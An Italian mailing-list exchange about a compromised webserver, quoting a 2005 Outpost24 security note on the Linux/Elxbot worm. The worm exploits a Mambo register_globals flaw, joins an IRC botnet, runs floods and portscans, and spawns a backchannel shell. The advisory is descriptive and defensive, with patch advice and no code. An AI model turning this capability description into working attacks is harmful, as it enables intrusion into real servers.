On gio, 2006-05-11 at 23:55 +0200, Filippo Biondi wrote:
> Il giorno gio, 11/05/2006 alle 20.54 +0200, Massimo Danieli ha scritto:
>
> > > 1) Come cavolo e' riuscito a far fare quella request al mio webserver?
> > > Ed a far eseguire il file una volta scaricatolo.
> > > E' per caso dovuto all'azione di un altro script?
> >
> > Probabilmente un software che permette injection-code (un bel forum in
> > php per caso, o mambo ? )
>
> la seconda che hai detto
From: David Jacoby <security_at_outpost24.com>
Date: Mon, 05 Dec 2005 21:23:23 +0100
_______ __ __ ______ _____
| |.--.--.| |_ .-----..-----..-----.| |_ |__ || | |
| - || | || _|| _ || _ ||__ --|| _|| __||__ |
|_______||_____||____|| __||_____||_____||____||______| |__|
Public Security Note |__| http://www.outpost24.com
[BACKGROUND]
Mambo is a dynamic portal engine and content management system.
The software is written in PHP. A computer researcher which
goes
under the alias rgod released an exploit for the
"register_globals"
Emulation Layer Overwrite vulnerability and just a few days
after
the vulnerability was released increased attacks for this
vulnerability
was monitored, the increased traffic is due to a worm which is
currently in the wild.
[DESCRIPTION]
Linux/Elxbot is a backdoor for the Mambo vulnerability. It will
search
on Google for vulnerable targets. Once it infects a computer it
will
connect to a predetermined IRC server where the attackers will
wait and
have the possibility to gain access to the infected computer.
The
attackers
may also perform various tasks such as:
* Execute arbitrary commands
* TCP flood
* HTTP flood
* UDP flood
* Search Google for more vulnerable targets
* Portscan
On certain systems it will also download a perl script which
will
allow the attacker to create a backchannel and spawn a shell on
the infected computer with the same privileges as the running
webserver.
A detailed profile is available for Outpost24 members, for more
information
please visit our webpage at http://www.outpost24.com
[SOLUTION]
Download the latest version from the official Mambo homepage or
download the specific patch for this vulnerability.
|